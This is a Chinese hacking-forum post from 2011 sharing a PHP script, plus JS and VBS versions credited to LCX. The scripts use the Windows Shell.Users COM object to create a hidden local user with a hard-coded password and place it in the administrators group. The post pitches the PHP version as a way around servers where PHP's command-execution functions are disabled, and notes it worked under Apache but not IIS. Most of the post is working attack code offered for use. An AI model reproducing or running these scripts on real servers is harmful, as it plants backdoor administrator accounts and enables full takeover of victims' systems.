議題作者:CyberH4ck[南拳Daddy]
Author: 南拳Daddy 轉載請注明出處 hi.baidu.com/南拳daddy
09年的時候 LCX 寫出了 js版 和vbs 版的shell.users 加管理員帳號的方法,後來我就想把它改成PHP 版,
由於對代碼分析得不夠准確,所以到最近才寫出來,當 php執行命令的函數如exec,system,shell_exec,proc_open,passthru,popen
以及wscript.shell 組建被禁用的情況下,這也許是一個機會。
代碼如下:
<?php
echo "<div align=center><b>PHP 版Shell.Users加管理員帳號</b></div>";
$username="IceSkin";
$password="skin.com";
$su = new COM("Shell.Users");
$h=$su->create($username);
$h->changePassword($password,"");
$h->setting["AccountType"] = 3;//這句很重要可以把用戶加入administrators 組,
?>
效果圖如下:
對apache 搭建的Web 服務器可以執行成功,IIS 好像權限不夠,nginx 和lighttpd 搭建的web 服務器還沒有測試。
下面是 LCX 的代碼
js:
var o=new ActiveXObject( "Shell.Users" );
z=o.create("test") ;
z.changePassword("123456","")
z.setting("AccountType")=3;
vbs:
Set o=CreateObject( "Shell.Users" )
Set z=o.create("test")
z.changePassword "123456",""
z.setting("AccountType")=3
[ 本帖最後由 CyberH4ck 於 2011-5-29 14:33 編輯 ]
